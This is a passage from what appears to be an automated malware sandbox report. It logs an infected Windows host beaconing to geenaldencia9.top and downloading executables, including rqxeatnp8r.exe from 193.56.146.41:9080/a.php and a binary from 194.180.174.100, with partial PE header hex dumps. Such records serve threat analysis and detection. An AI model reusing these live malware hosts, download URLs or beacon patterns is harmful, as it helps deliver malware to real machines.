                                                                                                                                                                                                  Content-Length: 25
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
                                                                                                                                                                                                  Data Ascii: No such file or directory


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  32192.168.2.649835194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.092586040 CEST23026OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 319
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.227099895 CEST23027INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:08 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 25
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
                                                                                                                                                                                                  Data Ascii: No such file or directory


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  33192.168.2.649836194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.486690044 CEST23028OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 231
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.640366077 CEST23028INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:08 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 25
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
                                                                                                                                                                                                  Data Ascii: No such file or directory


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  34192.168.2.649838194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:08.959021091 CEST23033OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 310
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.093051910 CEST23034INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:09 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 25
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
                                                                                                                                                                                                  Data Ascii: No such file or directory


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  35192.168.2.649839194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.321271896 CEST23035OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 153
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.466738939 CEST23036INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:09 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  36192.168.2.649840194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.571913958 CEST23037OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 198
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.718595982 CEST23038INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:09 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 3e 44 be f7 d8 e4 e4 45 f5 46 87 32 ef 06 10 95 4b e1 e1 39
                                                                                                                                                                                                  Data Ascii: I:82OI>DEF2K9


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  37192.168.2.649841193.56.146.419080C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.806711912 CEST23038OUTGET /a.php HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: 193.56.146.41:9080
                                                                                                                                                                                                  Sep 27, 2021 19:35:09.880815029 CEST23039INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:08 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                  Content-Transfer-Encoding: Binary
                                                                                                                                                                                                  Content-disposition: attachment; filename="rqxeatnp8r.exe"
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Data Raw: 32 34 61 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 62 8d 64 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 4c 01 00 00 48 09 00 00 00 00 00 2c 1b 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0a 00 00 04 00 00 f5 f8 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 91 01 00 54 00 00 00 2c 89 01 00 3c 00 00 00 00 00 0a 00 f0 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 74 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 4b 01 00 00 10 00 00 00 4c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 31 00 00 00 60 01 00 00 32 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 a0 01 00 00 1e 00 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 a8 00 00 00 00 0a 00 00 aa 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: 24a00MZ@!L!This program cannot be run in DOS mode.$PELbd`LH,`@T,<at@`|.textKL `.rdata1`2P@@.data|U@.rsrc@@


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  38192.168.2.649842194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.495538950 CEST23195OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 304
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:35:12.650259972 CEST23196INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:12 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  39192.168.2.649843194.180.174.10080
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:35:20.408343077 CEST23202OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 132
                                                                                                                                                                                                  Host: 194.180.174.100
                                                                                                                                                                                                  Sep 27, 2021 19:35:20.833514929 CEST23204INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:20 GMT
                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Data Raw: 66 33 37 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 63 4b 38 64 6a 73 73 73 4d 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 37 63 41 56 6f 51 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 59 41 72 75 66 30 50 2f 6d 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 65 67 65 32 30 49 67 35 38 59 4d 71 32 34 58 55 36 47 41 61 61 43 38 4f 72 37 6b 32 34 71 6c 58 61 6c 73 46 54 64 7a 47 44 62 76 4f 69 6c 36 57 34 4a 42 51 42 4b 33 79 52 75 77 66 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 53 39 37 46 64 73 67 6d 75 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 46 68 44 59 70 32 67 38 34 47 4c 42 79 49 74 67 66 5a 70 45 69 47 5a 6b 30 59 64 67 43 6a 6a 6c 6d 73 34 30 6e 31 57 74 32 54 64 59 75 4e 62 6c 31 61 39 2f 5a 36 44 71 57 67 43 51 56 37 44 6e 73 73 68 55 6b 64 31 79 4b 5a 31 48 6a 49 48 56 34 50 48 79 37 38 34 48 59 71 6f 73 78 45 7a 6c 35 55 74 42 63 32 6b 33 62 35 67 61 4b 5a 30 44 49 61 71 4f 50 32 58 63 4f 64 5a 6b 6f 63 45 77 53 62 69 43 4b 38 79 62 71 36 76 45 61 79 4a 34 5a 4f 41 30 54 2b 42 6f 51 37 6e 38 6a 6a 7a 59 4a 78 42 46 4e 46 51 76 6a 61 73 73 57 58 4f 49 72 55 6b 69 39 70 7a 2b 61 38 42 41 74 79 35 41 52 2b 77 6b 33 65 57 31 33 77 30 44 59 79 31 31 6b 34 33 6a 4e 69 38 65 70 4e 36 39 52 54 5a 54 70 56 7a 49 74 74 31 55 57 55 70 75 37 57 39 65 54 7a 79 39 36 4a 47 41 59 74 30 4d 79 44 38 6c 75 49 49 49 43 54 6f 39 69 4f 65 4f 6b 39 59 35 62 6a 43 2b 68 79 49 79 64 64 44 70 62 6a 44 71 4f 33 39 37 46 7a 45 73 67 5a 65 4c 46 34 65 32 54 6f 64 6f 54 79 30 6d 49 52 76 48 63 62 69 4e 70 71 71 54 50 4c 57 54 53 4b 67 56 64 32 72 66 79 7a 74 79 50 41 34 50 39 47 35 4a 55 47 76 48 47 77 49 47 44 33 58 65 46 4a 35 52 58 33 55 7a 74 49 74 62 45 76 2b 77 35 30 69 34 32 47 33 62 47 72 48 35 34 72 35 6a 74 45 68 68 73 76 54 33 77 62 42 35 32 2b 55 72 66 78 57 73 51 66 44 34 6c 31 63 51 78 76 50 55 69 56 36 69 4d 6d 48 36 68 6c 52 4f 46 6f 71 78 4d 79 35 4d 62 35 48 37 66 41 50 70 42 48 59 49 71 61 57 49 4e 57 50 46 55 76 38 5a 6f 7a 57 58 71 41 31 47 59 6b 32 69 2b 2b 38 67 44 58 36 68 32 31 46 41 2b 38 6b 61 32 6b 42 77 31 59 64 53 4c 4e 72 70 4f 6c 55 71 6b 55 56 73 50 44 6c 41 46 69 69 74 53 2b 38 52 75 70 6a 5a 48 5a 53 72 73 74 6e 44 32 4c 7a 38 72 70 65 34 71 48 64 69 45 64 65 4d 54 38 57 42 2f 65 78 55 49 62 33 30 48 42 46 44 6a 76 68 71 53 61 64 64 57 36 75 4f 6a 4d 63 45 72 58 2f 38 30 35 33 68 71 71 65 4b 33 70 46 54 51 38 6b 79 5a 66 6e 4d 2f 63 6a 66 69 4c 78 31 4f 6a 43 35 2b 38 6f 53 78 37 53 46 2b 58 56 43 48 4f 4e 56 77 30 75 75 64 49 35 42 33 61 31 62 71 64 67 6a 59 57 76 4e 38 2f 32 4b 70 48 36 6c 41 33 36 48 4e 79 2b 50 49 74 45 54 5a 71 74 6a 2b 6f 44 59 55 38 73 63 68 75 6d 65 6e 6d 51 59 78 66 70 43 78 61 45 59 32 70 75 6e 56 31 65 45 7a 2b 57 73 6e 78 56 58 58 36 48 43 4f 31 57 33 48 31 6d 47 48 6e 43 48 4c 39 55 69 30 4a 39 71 72 32 58 6e 78 51 59 6b 46 33 71 4f 42 68 58 33 6e 4a 65 4a 48 48 41 74 64 49 49 49 75 2f 4f 69 4e 49 31 30 73 66 50 77 52 70 4c 7a 47 5a 64 67 34 72 52 30 65 78 41 4b 50 78 37 43 33 46 4e 41 62 78 35 65 2f 41 6e 38 31 54 43 6a 58 71 75 34 63 67 6b 75 4a 73 74 71 4e 55 43 43 46 6a 48 77 67 7a 50 4c 33 42 51 68 54 48 4e 4a 64 54 4e 55 51 71 4a 44 4f 4a 34 32 5a 71 63 45 6c 7a 4c 36 6a 38 73 53 37 6d 64 66 45 33 39 76 46 33 48 63 64 33 76 68 79 74 66 4e 4a 35 71 58 50 51 46 44 61 74 42 53 34 30 68 53 4c 75 79 53 52 32 32 73 37 33 75 35 38 4a 58 55 66 4b 55 66 7a 47 2b 74
                                                                                                                                                                                                  Data Ascii: f37unN2GK+nPmcK8djsssMEy55RM+acetOz7cAVoQ3WAOVMT0Fbn38HbQYAruf0P/m8wKVq28x0Zm3Hege20Ig58YMq24XU6GAaaC8Or7k24qlXalsFTdzGDbvOil6W4JBQBK3yRuwf4b124vbL7XayDSfkgS97FdsgmuYytO5JN0BtYOTFhDYp2g84GLByItgfZpEiGZk0YdgCjjlms40n1Wt2TdYuNbl1a9/Z6DqWgCQV7DnsshUkd1yKZ1HjIHV4PHy784HYqosxEzl5UtBc2k3b5gaKZ0DIaqOP2XcOdZkocEwSbiCK8ybq6vEayJ4ZOA0T+BoQ7n8jjzYJxBFNFQvjassWXOIrUki9pz+a8BAty5AR+wk3eW13w0DYy11k43jNi8epN69RTZTpVzItt1UWUpu7W9eTzy96JGAYt0MyD8luIIICTo9iOeOk9Y5bjC+hyIyddDpbjDqO397FzEsgZeLF4e2TodoTy0mIRvHcbiNpqqTPLWTSKgVd2rfyztyPA4P9G5JUGvHGwIGD3XeFJ5RX3UztItbEv+w50i42G3bGrH54r5jtEhhsvT3wbB52+UrfxWsQfD4l1cQxvPUiV6iMmH6hlROFoqxMy5Mb5H7fAPpBHYIqaWINWPFUv8ZozWXqA1GYk2i++8gDX6h21FA+8ka2kBw1YdSLNrpOlUqkUVsPDlAFiitS+8RupjZHZSrstnD2Lz8rpe4qHdiEdeMT8WB/exUIb30HBFDjvhqSaddW6uOjMcErX/8053hqqeK3pFTQ8kyZfnM/cjfiLx1OjC5+8oSx7SF+XVCHONVw0uudI5B3a1bqdgjYWvN8/2KpH6lA36HNy+PItETZqtj+oDYU8schumenmQYxfpCxaEY2punV1eEz+WsnxVXX6HCO1W3H1mGHnCHL9Ui0J9qr2XnxQYkF3qOBhX3nJeJHHAtdIIIu/OiNI10sfPwRpLzGZdg4rR0exAKPx7C3FNAbx5e/An81TCjXqu4cgkuJstqNUCCFjHwgzPL3BQhTHNJdTNUQqJDOJ42ZqcElzL6j8sS7mdfE39vF3Hcd3vhytfNJ5qXPQFDatBS40hSLuySR22s73u58JXUfKUfzG+t
                                                                                                                                                                                                  Sep 27, 2021 19:35:20.921103001 CEST23209OUTGET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Host: 194.180.174.100
                                                                                                                                                                                                  Sep 27, 2021 19:35:21.199342966 CEST23211INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:21 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 916735
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
                                                                                                                                                                                                  ETag: "612fa893-dfcff"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 